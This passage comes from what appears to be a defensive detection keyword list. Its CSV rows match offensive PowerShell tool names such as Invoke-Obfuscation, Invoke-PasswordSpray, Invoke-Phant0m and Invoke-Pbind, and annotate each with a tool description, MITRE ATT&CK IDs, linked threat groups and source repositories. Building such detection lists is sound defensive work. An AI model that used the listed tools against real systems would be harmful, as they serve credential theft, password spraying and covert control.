Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1148","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49244" "*Invoke-Obfuscation -ScriptPath *",".{0,1000}Invoke\-Obfuscation\s\-ScriptPath\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","49245" 
"*Invoke-Obfuscation*",".{0,1000}Invoke\-Obfuscation.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","1","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","49246" "*Invoke-Obfuscation.psd1*",".{0,1000}Invoke\-Obfuscation\.psd1.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","49247" "*Invoke-OpenInboxFinder*",".{0,1000}Invoke\-OpenInboxFinder.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. 
or by an administrator to search the mailboxes of every user in a domain.","T1087.003 - T1110.003 - T1114.002","TA0006 -TA0009 -TA0007","N/A","Leafminer","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","N/A","10","3046","580","2024-08-07T18:11:58Z","2016-09-08T00:36:51Z","49248" "*Invoke-OpenOWAMailboxInBrowser*",".{0,1000}Invoke\-OpenOWAMailboxInBrowser.{0,1000}","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","6","7","652","105","2024-12-06T15:51:42Z","2021-07-08T02:28:12Z","49249" "*Invoke-OxidResolver*",".{0,1000}Invoke\-OxidResolver.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49250" "*Invoke-Oxidresolver*",".{0,1000}Invoke\-Oxidresolver.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49251" "*Invoke-OxidResolver*",".{0,1000}Invoke\-OxidResolver.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation 
tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49252" "*Invoke-P0wnedshell*",".{0,1000}Invoke\-P0wnedshell.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49253" "*Invoke-P0wnedshellx86*",".{0,1000}Invoke\-P0wnedshellx86.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49254" "*Invoke-PacketCapture*",".{0,1000}Invoke\-PacketCapture.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49255" "*Invoke-PacketKnock*",".{0,1000}Invoke\-PacketKnock.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","PowerBreach.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49256" "*Invoke-Pandemonium -Command*",".{0,1000}Invoke\-Pandemonium\s\-Command.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","49257" "*Invoke-Pandemonium.ps1*",".{0,1000}Invoke\-Pandemonium\.ps1.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","49258" "*Invoke-Paranoia*",".{0,1000}Invoke\-Paranoia.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-Paranoia.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49259" "*Invoke-Paranoia.ps1*",".{0,1000}Invoke\-Paranoia\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - 
T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49260" "*Invoke-ParentalKilling*",".{0,1000}Invoke\-ParentalKilling.{0,1000}","offensive_tool_keyword","cobaltstrike","powershell function used with cobaltstrike to kill parent process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - 
Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/ElevateKit","1","0","N/A","N/A","10","10","912","203","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z","49261" "*Invoke-PassSpray*",".{0,1000}Invoke\-PassSpray.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","49262" "*Invoke-PassSpray*",".{0,1000}Invoke\-PassSpray.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","49263" "*Invoke-PassSpray*",".{0,1000}Invoke\-PassSpray.{0,1000}","offensive_tool_keyword","PassSpray","Domain Password Spray","T1110.003 - T1078","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/Leo4j/PassSpray","1","1","N/A","N/A","10","1","7","3","2025-02-20T10:07:43Z","2023-11-16T13:35:49Z","49264" 
"*Invoke-PasswordSpray*",".{0,1000}Invoke\-PasswordSpray.{0,1000}","offensive_tool_keyword","MailSniper","Invoke-PasswordSpray* will attempt to connect to an * portal and perform a password spraying attack using a userlist and a single password.","T1087.003 - T1110.003 - T1114.002","TA0006 -TA0009 -TA0007","N/A","Leafminer","Exploitation tool","https://github.com/dafthack/MailSniper","1","1","N/A","N/A","N/A","10","3046","580","2024-08-07T18:11:58Z","2016-09-08T00:36:51Z","49265" "*Invoke-PasswordSprayEAS*",".{0,1000}Invoke\-PasswordSprayEAS.{0,1000}","offensive_tool_keyword","EASSniper","EASSniper is a penetration testing tool for account enumeration and brute force attacks against Exchange Active Sync (EAS)","T1110 - T1078.003 - T1087.002 - T1059.001","TA0006 -TA0007 - TA0009 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/fugawi/EASSniper","1","1","N/A","N/A","10","1","5","4","2018-04-17T23:23:31Z","2018-04-17T22:43:51Z","49266" "*Invoke-PasswordSprayEAS*",".{0,1000}Invoke\-PasswordSprayEAS.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1087.003 - T1110.003 - T1114.002","TA0006 -TA0009 -TA0007","N/A","Leafminer","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","N/A","10","3046","580","2024-08-07T18:11:58Z","2016-09-08T00:36:51Z","49267" "*Invoke-PasswordSprayEWS*",".{0,1000}Invoke\-PasswordSprayEWS.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). 
It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1087.003 - T1110.003 - T1114.002","TA0006 -TA0009 -TA0007","N/A","Leafminer","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","N/A","10","3046","580","2024-08-07T18:11:58Z","2016-09-08T00:36:51Z","49268" "*Invoke-PasswordSprayGmail*",".{0,1000}Invoke\-PasswordSprayGmail.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1087.003 - T1110.003 - T1114.002","TA0006 -TA0009 -TA0007","N/A","Leafminer","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","N/A","10","3046","580","2024-08-07T18:11:58Z","2016-09-08T00:36:51Z","49269" "*Invoke-PasswordSprayOWA*",".{0,1000}Invoke\-PasswordSprayOWA.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. 
or by an administrator to search the mailboxes of every user in a domain.","T1087.003 - T1110.003 - T1114.002","TA0006 -TA0009 -TA0007","N/A","Leafminer","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","N/A","10","3046","580","2024-08-07T18:11:58Z","2016-09-08T00:36:51Z","49270" "*Invoke-Patamenia.ps1*",".{0,1000}Invoke\-Patamenia\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","49271" "*Invoke-PatchDll -DllBytes *",".{0,1000}Invoke\-PatchDll\s\-DllBytes\s.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","49272" "*Invoke-PatchDll*",".{0,1000}Invoke\-PatchDll.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-BypassUAC.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49273" "*Invoke-PatchDll*",".{0,1000}Invoke\-PatchDll.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-PSInject.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49274" "*Invoke-Pbind *",".{0,1000}Invoke\-Pbind\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - 
TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","49275" "*Invoke-Pbind.ps1*",".{0,1000}Invoke\-Pbind\.ps1.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","49276" "*Invoke-Phant0m*",".{0,1000}Invoke\-Phant0m.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49277" "*Invoke-Phant0m*",".{0,1000}Invoke\-Phant0m.{0,1000}","offensive_tool_keyword","cobaltstrike","Aggressor script to integrate Phant0m with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - 
